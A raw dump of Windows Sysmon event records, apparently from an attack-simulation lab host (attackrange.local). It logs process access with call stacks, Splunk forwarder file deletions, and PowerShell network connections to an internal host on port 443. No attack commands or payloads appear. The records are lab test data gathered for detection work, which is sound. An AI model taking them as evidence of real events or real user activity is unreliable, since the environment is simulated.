15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035344002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.139{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F46C9CD900099810E78FFBA12062FD,SHA256=1C339D1A77AD1422DE9199EBAB7AFD9E8B86AB29F569C3773731DD1B74651C12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:58.539{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=044A6C3ACF79EA68ADF19B5742C90B0B,SHA256=D29D14C7121D715885F3F071E721BBB36342CEC4DFFA743CC382F6155BFFF902,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:25.630{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52628-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:59.638{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E8C30D79CA9A35B541E36DCFE30690EB,SHA256=DB2C3099954839477F7A6128020E116AE30DF476E5A3D10C4443F9933709C426,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:59.556{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CEEBFE6D087EDADEAF323E31DA97FC,SHA256=BCCCBDF144E67ED154DD366D2E5A7AA190F07D7EA308E8317DDEEC10110EA545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:26.161{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52629-false10.0.1.12-8000- 23542300x800000000000000035344036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:00.559{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0405ABBDED5F7B97CBBA7129B3891233,SHA256=0FA2AD3C28B382F8ED0180CADF6B2CECAA7E2D64897DB8B2B13D3176572DA374,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:01.590{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55A1855167227F437BAA467F8E11BED4,SHA256=1DBCDBAE7743627EE5537CF2C61C7C4970E5FBD4FBDAAC9929AFFECB6043AC69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:02.621{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51268F8F98DEC2A4CD44CA658E2D7F63,SHA256=E10B172B795B78B16C77CE33B226EE80A57E1ADEAD629246D1901EAAFD239D24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:29.645{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52630-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:03.755{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9A8D6E6274FCA852238B29DFFD623082,SHA256=4F56E976C8F80D01F7AB1CA9202F2928490C82CBE971085CFE4A90B4807FF2EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:03.653{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B3AE4D58811B4C19DE9FA2D113A1E3D,SHA256=C95492895DD1977BFDF02AD0B3A227A0784BE2BCA99491CC1330823D2D0756E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.760{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74D4-613B-73B4-03000000C801}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.758{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.758{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.758{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.758{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.756{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-74D4-613B-73B4-03000000C801}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.755{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74D4-613B-73B4-03000000C801}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.739{B81B27B7-74D4-613B-73B4-03000000C801}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035344052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.691{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B851BFB5B4DCA1BF50F8F781A9AF9CE,SHA256=B08591834283A8A4716552D5F2B8DE91AFCB94BF10E428053BB847462F4396F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.220{B81B27B7-74D4-613B-72B4-03000000C801}67205920C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.058{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74D4-613B-72B4-03000000C801}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.058{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.058{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 